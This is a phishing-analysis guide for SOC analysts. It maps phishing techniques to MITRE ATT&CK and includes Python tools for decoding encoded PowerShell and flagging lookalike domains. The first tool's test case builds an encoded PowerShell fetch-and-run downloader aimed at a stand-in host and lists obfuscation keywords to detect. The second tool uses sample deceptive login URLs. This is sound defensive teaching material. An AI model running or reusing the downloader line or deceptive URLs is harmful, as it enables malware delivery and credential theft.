Phishing Analysis is the methodical process of analysing a suspected phishing attack for indicators of compromise/attack. While email is the most common vector, modern phishing campaigns exploit SMS (smishing), voice calls (vishing), social media, and web-based attack surfaces. (Check the Phishing Attacks article for a refresher.)
SOC Analysts must be able to systematically analyse phishing attempts, determine their legitimacy, identify Indicators of Compromise (IOCs), and recommend remediation steps. This guide presents a generalised phishing analysis methodology that is scalable, channel-agnostic, and operationally practical.
Phishing analysis can be broken down into the 9 phases listed below.
TIP: Keeping detailed notes throughout the various phases and steps is crucial. Doing so enables a security analyst to record all IOCs, reconstruct an accurate timeline of events, correlate the artefacts and events with the known tactics, techniques, and procedures of threat actors, help other security team members follow the analysis efficiently, and support remediation of any misconfigurations or security flaws, thereby mitigating future vulnerabilities, threats, and attacks.
As covered in Phase 2: Collect Artefacts, depending on the type of phishing attack (and thus communication channel), phishing analysis can be divided into four areas: Domain Analysis, URL Analysis, Attachment Analysis, and Email Header Analysis.
Phishing techniques span multiple MITRE ATT&CK tactics depending on the attacker's objective. The entries below cover the full chain from initial reconnaissance through to post-click execution.
Attackers use phishing techniques during the reconnaissance phase to gather information before launching a full attack; this includes harvesting credentials, learning about internal systems, or profiling targets. This is distinct from Initial Access phishing; the goal here is intelligence gathering, not direct compromise.
T1598.001 - Spearphishing via Service: Using third-party services such as LinkedIn, Microsoft Teams, WhatsApp, or social media platforms to send targeted messages designed to elicit information or credentials from the target. The platform's legitimacy lowers the target's guard.
T1598.002 - Spearphishing Attachment: Sending a targeted email with a malicious or deceptive attachment (such as a fake form or document), intended to harvest credentials or sensitive information rather than deliver malware directly.
T1598.003 - Spearphishing Link: Sending a targeted email containing a link to a credential harvesting page or fake login portal. The target is socially engineered into visiting the page and submitting sensitive information.
The most commonly observed phishing tactic in SOC environments. The attacker's goal is to gain an initial foothold in the target environment by delivering a malicious payload or directing the user to an attacker-controlled resource.
T1566.001 - Spearphishing Attachment: A targeted email carrying a malicious attachment (commonly a macro-enabled Office document, PDF, ISO, or archive file) that executes a payload when opened. This is one of the most prevalent initial access vectors observed in enterprise environments.
T1566.002 - Spearphishing Link: A targeted email containing a URL that directs the user to a malicious page, typically a credential harvesting portal, a drive-by download site, or a page that serves a malicious payload based on the user's browser or OS profile.
T1566.003 - Spearphishing via Service: Using a legitimate third-party communication platform, such as Google Drive, OneDrive, Microsoft Teams, Slack, LinkedIn, or a cloud file-sharing service, to deliver phishing content. This technique is increasingly common as organisations tighten email security controls, because many security tools do not monitor these channels as closely.
Phishing attacks typically require the target to take an action to trigger the payload. These techniques describe that user-interaction dependency.
T1204.001 - Malicious Link: The user clicks a link delivered via phishing that initiates a malicious action, such as downloading a payload, redirecting to a credential harvest page, or triggering a drive-by exploit.
T1204.002 - Malicious File: The user opens or executes a malicious file delivered via phishing, enabling a macro, running a script, or executing a dropped binary. This is the execution-side complement to T1566.001.
These techniques are commonly observed in the payload stage of phishing attacks, used to evade detection and execute malicious code on the victim's system.
T1027 - Obfuscated Files or Information: Attackers obfuscate macro code, PowerShell commands, or scripts to evade antivirus and email gateway detection. Common techniques include Base64 encoding, character substitution, and string concatenation across multiple variables.
T1059.001 - PowerShell: Macro-based payloads frequently drop and execute PowerShell commands to download second-stage malware, establish persistence, or enumerate the environment. Often combined with T1027 via the -EncodedCommand flag.
T1059.003 - Windows Command Shell: The Windows Command Shell (cmd) can be used to run commands and payloads, either interactively or through batch scripts (.bat or .cmd), to establish persistence or enumerate the environment.
T1059.005 - Visual Basic: VBA macros embedded in Office documents are one of the most common phishing payload mechanisms. They execute automatically via AutoOpen or Document_Open triggers, with no user awareness beyond the act of enabling macros.
T1056.003 - Input Capture - Web Portal Capture: A fake login page, mimicking Microsoft 365, banking portals, or corporate VPNs, captures credentials entered by the victim. This is the technical mechanism behind the majority of credential harvesting phishing campaigns.
T1539 - Steal Web Session Cookie: Rather than capturing a password directly, some phishing attacks use adversary-in-the-middle proxies (e.g., Evilginx2, Modlishka) to intercept and steal authenticated session cookies, bypassing MFA entirely.
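The T1059.001 + T1027 pairing above (PowerShell launched with -EncodedCommand from an Office parent) is something an analyst meets constantly in process-creation telemetry, so here is a small triage helper for it. This is an added example, not code from the original article: it decodes the UTF-16LE Base64 argument that -EncodedCommand (and its abbreviations -e, -ec, -enc) accepts, pulls URLs out of the decoded script as IOCs, and tags the event with the technique IDs discussed in this section. The event field names (parent_image, command_line), the sample command lines, and the tagging rules are constructed for illustration and are a heuristic, not an official ATT&CK mapping.

```python
"""Triage helper for encoded PowerShell seen in phishing payload chains.

Added example, not part of the original article. Event field names,
sample data and the technique-tagging rules are constructed heuristics.
"""
import base64
import binascii
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...).
# The prefix check in decode_encoded_command() rejects other -e* flags (-ExecutionPolicy, -ep).
_FLAG_RE = re.compile(r"(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]{4,})", re.IGNORECASE)
_URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.IGNORECASE)
# Strings in a decoded script that commonly indicate further obfuscation (T1027).
# Heuristic only: '-join' and 'replace(' also appear in benign administration scripts.
_OBFUSCATION_HINTS = ("frombase64string", "-join", "[char]", "replace(", "iex", "invoke-expression")
# Office parents spawning a shell is the classic macro -> payload step (T1059.005 / T1204.002).
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe")


def encode_command(script: str) -> str:
    """Build the UTF-16LE + Base64 form PowerShell expects.

    Used only to construct test input, the way an analyst builds a detection test case."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(command_line: str):
    """Return the decoded script from the first -EncodedCommand argument, or None."""
    for match in _FLAG_RE.finditer(command_line):
        flag, blob = match.group(1).lower(), match.group(2)
        if not "encodedcommand".startswith(flag):
            continue  # some other -e* parameter, e.g. -ExecutionPolicy Bypass
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (binascii.Error, UnicodeDecodeError):
            return None  # malformed Base64 or odd byte count: not a valid encoded command
    return None


def triage_process_event(event: dict) -> dict:
    """Map one process-creation event to IOCs and ATT&CK technique IDs.

    'event' is a constructed dict with 'parent_image' and 'command_line' keys."""
    cmd = event.get("command_line", "")
    parent = event.get("parent_image", "").lower().rsplit("\\", 1)[-1]
    decoded = decode_encoded_command(cmd)
    techniques = set()
    if "powershell" in cmd.lower():
        techniques.add("T1059.001")
    if decoded is not None:
        techniques.add("T1027")  # the command line itself was Base64-encoded
    script = decoded if decoded is not None else cmd
    if any(hint in script.lower() for hint in _OBFUSCATION_HINTS):
        techniques.add("T1027")
    if parent in OFFICE_PARENTS:
        techniques.update({"T1204.002", "T1059.005"})
    return {
        "decoded_script": decoded,
        "urls": sorted(set(_URL_RE.findall(script))),
        "techniques": sorted(techniques),
    }


if __name__ == "__main__":
    # Constructed event: Word spawning PowerShell with an encoded downloader one-liner.
    sample_script = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
    sample_event = {
        "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "command_line": "powershell.exe -ExecutionPolicy Bypass -EncodedCommand " + encode_command(sample_script),
    }
    print(triage_process_event(sample_event))
```

The decoder deliberately returns None rather than raising on a malformed blob, so a bulk run over a day of telemetry does not stop on one corrupted record; the analyst's notes should still record such events, because a decode failure on a PowerShell launch from an Office parent is itself worth a look.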
✏️ SOC Analyst Note: When triaging a phishing alert, mapping your findings to the relevant ATT&CK technique provides consistent, structured context for your incident report and enables correlation with threat intelligence on known threat actor TTPs. A single phishing email may map to multiple techniques simultaneously; for example, T1566.001 (delivery) + T1059.005 (VBA macro) + T1059.001 (PowerShell payload) + T1027 (obfuscation) is a common chain observed in commodity malware campaigns such as Emotet and QakBot.
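For the credential-harvesting side (T1056.003 and T1566.002), the URL Analysis and Domain Analysis areas mentioned earlier come down to asking whether the host a link actually resolves to belongs to the brand the page imitates. Below is an added example of that check, not code from the original article: it normalises the hostname for common digit-for-letter substitutions, extracts the registrable domain, and flags brand names appearing outside an allowlist of the brand's real domains, plus the structural tricks seen in phishing links (userinfo before '@', raw IP hosts, punycode labels, deep subdomain nesting). The allowlist, the homoglyph table and the sample URLs are constructed; the registrable-domain extraction is a deliberate simplification (last two labels) that a production tool would replace with a public-suffix-list lookup.

```python
"""Lookalike-domain triage for URLs extracted from a phishing message.

Added example, not part of the original article. The brand allowlist,
homoglyph table and sample URLs are constructed for illustration.
"""
import re
from urllib.parse import urlsplit

# Constructed allowlist: registrable domains the brand genuinely uses.
BRAND_DOMAINS = {
    "microsoft": {"microsoft.com", "microsoftonline.com", "live.com", "office.com"},
}
# Digit/symbol substitutions commonly used to spell a brand in a lookalike host.
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "@": "a"})
_IPV4_RE = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


def registrable_domain(host: str) -> str:
    """Simplified registrable domain: the last two labels (no public-suffix list)."""
    labels = host.lower().strip(".").split(".")
    return ".".join(labels[-2:])


def analyse_url(url: str) -> dict:
    """Return the real host of a URL and a list of lookalike / structural findings."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    findings = []
    if parts.username is not None:
        # https://brand.com@attacker.example/ : the browser connects to attacker.example
        findings.append("userinfo before '@' hides the real host")
    is_ip = bool(_IPV4_RE.fullmatch(host))
    if is_ip:
        findings.append("raw IP address instead of a hostname")
    if any(label.startswith("xn--") for label in host.split(".")):
        findings.append("punycode label (possible homograph)")
    if not is_ip and host.count(".") >= 3:
        findings.append("deep subdomain nesting")
    reg = registrable_domain(host)
    normalised = host.translate(HOMOGLYPHS).replace("-", "")
    for brand, legit in BRAND_DOMAINS.items():
        if reg in legit:
            return {"host": host, "registrable_domain": reg, "findings": findings, "verdict": "allowlisted"}
        if brand in normalised:
            findings.append(f"'{brand}' in hostname but registrable domain {reg} is not a {brand} domain")
    verdict = "suspicious" if findings else "no lookalike indicators"
    return {"host": host, "registrable_domain": reg, "findings": findings, "verdict": verdict}


if __name__ == "__main__":
    # Constructed sample links as they might appear in a credential-phishing email.
    for sample in (
        "https://login.microsoft.com/common/oauth2",
        "https://login.micr0soft-365.example/auth",
        "https://microsoft.com@203.0.113.5/login",
    ):
        print(sample, "->", analyse_url(sample))
```

Note that the allowlist check short-circuits before the brand-keyword check, so a legitimate login host is never reported as an impersonation of itself; the trade-off is that the simplified registrable-domain logic would treat a multi-label public suffix (for example a .co.uk host) incorrectly, which is why a real deployment should swap in a public-suffix-list lookup.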